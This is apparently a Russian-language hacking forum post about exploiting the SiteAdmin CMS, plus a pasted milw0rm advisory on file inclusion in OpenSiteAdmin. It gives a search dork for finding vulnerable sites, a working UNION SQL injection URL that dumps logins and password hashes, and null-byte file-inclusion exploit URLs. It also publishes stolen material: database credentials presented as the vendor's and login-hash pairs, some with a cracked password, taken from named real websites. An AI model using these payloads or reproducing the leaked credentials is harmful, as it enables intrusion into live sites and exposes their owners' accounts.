SiteAdmin site: http://as-admin.com version: последняя с оффсайта, а если верить тому, что написано в скриптах, то v.1.4 dork: inurl:line2.php для версии без модреврайта и нечто похожее для версии с модреврайтом уязвимость в файле cnews.lib.php PHP: function printInfo($tpl, $index='', $other_limit=0) { if(!$this->active) return; $id=getParm('art'); if(!$index) $index=$this->url_self; if(!$id) return; $sql="select * from {$this->info_table} info where info.news_id=$id"; $res=mysql_query($sql) or print(mysql_error()); if (@mysql_num_rows($res)) { ................................................................. где функция getParm в файле common.lib.php PHP: function getParm($var_name, $def_val='', $type='', $max=8064) { if(!isset($GLOBALS['uri_set'])||!$GLOBALS['uri_set']) return sGetParm($var_name, $def_val, $type, $max); switch (strtoupper($type)) { //GET case 'G': $var=isset($_GET["$var_name"])?$_GET["$var_name"]:(isset($HTTP_GET_VARS["$var_name"])?$HTTP_GET_VARS["$var_name"]:$def_val); $max=min($max,255); break; //POST case 'P': $var=isset($_POST["$var_name"])?$_POST["$var_name"]:(isset($HTTP_POST_VARS["$var_name"])?$HTTP_POST_VARS["$var_name"]:$def_val); break; //COOKIE case 'C': $var=isset($_COOKIE["$var_name"])?$_COOKIE["$var_name"]:(isset($HTTP_COOKIE_VARS["$var_name"])?$HTTP_COOKIE_VARS["$var_name"]:$def_val); break; //FILES case 'F': $var=isset($_FILES["$var_name"])?$_FILES["$var_name"]:(isset($HTTP_POST_FILES["$var_name"])?$HTTP_POST_FILES["$var_name"]:$def_val); break; //SESSION case 'S': $var=isset($_SESSION["$var_name"])?$_SESSION["$var_name"]:(isset($HTTP_SESSION_VARS["$var_name"])?$HTTP_SESSION_VARS["$var_name"]:$def_val); break; //ENV case 'E': $var=isset($_ENV["$var_name"])?$_ENV["$var_name"]:(isset($HTTP_ENV_VARS["$var_name"])?$HTTP_ENV_VARS["$var_name"]:$def_val); break; //ALL (EXCEPT SESSION & ENV) default: $var=isset($_REQUEST["$var_name"])?$_REQUEST["$var_name"]:$def_val; } if(!is_array($var) && strlen($var)>$max) { $var=substr($var,0,$max); } 
return $var; } В общем, никакой фильтрации: getParm() возвращает значение параметра как есть (единственная обработка — обрезка строки до $max символов), а printInfo() подставляет $id=getParm('art') напрямую в запрос `... where info.news_id=$id` без приведения к числу и без экранирования — классическая SQL-инъекция через параметр art. Минимальное исправление: `$id=(int)getParm('art');` (или подготовленные выражения вместо конкатенации строки запроса). Далее есть файл настроек (конфиг приведён ниже), в котором реквизиты доступа к MySQL лежат в открытом виде. P.S. По оффсайту (логин::хеш; хеши по 32 hex-символа — по виду несолёный MD5, нужно проверить): [email protected]::e7cb5347305e316067fd0f23b763b409 [email protected]::352490db5c690967a62f6c684211b1b5 [email protected]::dad32a5aa256160e695870a6f58646ab [email protected]::2bb56da7e88e7597716e05168b5f53e7 [email protected]::40f464cb41198e44392061b18977b0f4 [email protected]::260b4afd213f0f5742af6a5eb067ffe1 [email protected]::26c723d68b0d815982d39a2e76d3ab72 Конфиг PHP: /* Configuration file for "Test" * Created by STM-studio [email protected] * v.1.4 */ $cfg['mysql_server'] ='localhost'; $cfg['mysql_database'] ='as-admin'; $cfg['mysql_user'] ='tarasua'; $cfg['mysql_spassword'] ='1508SuperKap'; $cfg['prefix'] ='sa'; //Префікс таблиць бази даних $cfg['lang'] ='ru,ua,en'; //Наявні мови сайту
OpenSiteAdmin <= 0.9.1.1 Multiple File Inclusion Vulnerabilities. Vulnerable Code (each of these files builds a require_once() path from a $path variable that the excerpts never show being assigned or validated; the includes are reachable from the request only if $path can be populated from user input, e.g. with register_globals enabled — confirm against the full files): PHP: -OpenSiteAdmin/indexFooter.php require_once($path."footer.php"); -OpenSiteAdmin/scripts/classes/DatabaseManager.php require_once($path."OpenSiteAdmin/include.php"); require_once($path."OpenSiteAdmin/scripts/classes/ErrorLogManager.php"); -OpenSiteAdmin/scripts/classes/FieldManager.php require_once($path."OpenSiteAdmin/scripts/classes/Fields/Checkbox.php"); require_once($path."OpenSiteAdmin/scripts/classes/Fields/ForeignKey.php"); ..... .. -OpenSiteAdmin/scripts/classes/Filter.php require_once($path."OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php"); -OpenSiteAdmin/scripts/classes/Form.php require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_List.php"); require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_Single.php"); -OpenSiteAdmin/scripts/classes/FormManager.php require_once($path."OpenSiteAdmin/scripts/classes/Form.php"); -OpenSiteAdmin/scripts/classes/LoginManager.php require_once($path."OpenSiteAdmin/scripts/classes/SecurityManager.php"); -OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php require_once($path."OpenSiteAdmin/scripts/classes/RowManager.php"); Exploit (the trailing %00 is a null-byte truncation that discards the hard-coded suffix appended after the attacker-controlled prefix; it only works on PHP builds that do not reject NUL bytes in include paths, i.e. before 5.3.4, and remote inclusion additionally requires allow_url_include): Code: http://www.vulnerable.com/OpenSiteAdmin/indexFooter.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FieldManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filter.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Form.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FormManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/LoginManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=<File Inclusion>%00 Fix: derive the include prefix from a constant (e.g. dirname(__FILE__)) rather than a variable, and never include a path built from request data. (c)milw0rm.com
Сегодня просканировал сканером (AWVS 4) — он нашёл 57 инъекций. Юзаем (UNION-инъекция через тот же параметр art: первый `limit 0` отбрасывает строки исходного запроса, а `union select` с семью столбцами вытаскивает логин и хеш пароля из таблицы auth_users; число столбцов, судя по всему, подобрано под исходный `select *`): PHP: xxx.com/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2 Отчёт AWVS4 PHP: http://rapidshare.com/files/132908385/__1057___1080___1089___1090___1077___1084___1072____1091___1087___1088___1072___1074___1083___1077__.html И бонус (сайт → логин::хеш; один и тот же хеш 40f464cb41198e44392061b18977b0f4 повторяется на нескольких хостах, что похоже на общую учётку разработчика/поставщика — проверить): Code: http://www.e-light.com.ua/line2.php andrei::62a7ba583911f266cd400d8864b86999 http://www.cifrotech.com.ua/line2.php mcm::bc37283c8e236d39f9a74881498eb1d5 http://www.vp.com.ua/line2.php [email protected]::40f464cb41198e44392061b18977b0f4 http://vesnasouvenir.com.ua/line2.php [email protected] 40f464cb41198e44392061b18977b0f4 http://piton.com.ua/line2.php [email protected]::40f464cb41198e44392061b18977b0f4 ops-print.com.ua/line2.php [email protected]::40f464cb41198e44392061b18977b0f4 http://pigment.com.ua/line2.php [email protected]::e7cb5347305e316067fd0f23b763b409 2hgjrpfa http://trol.com.ua/line2.php [email protected]::40f464cb41198e44392061b18977b0f4 http://expoland.com.ua/line2.php [email protected]::40f464cb41198e44392061b18977b0f4 http://www.eva.dp.ua/line2.php [email protected]::e7cb5347305e316067fd0f23b763b409 2hgjrpfa www.as-admin.com/ [email protected]::e7cb5347305e316067fd0f23b763b409 2hgjrpfa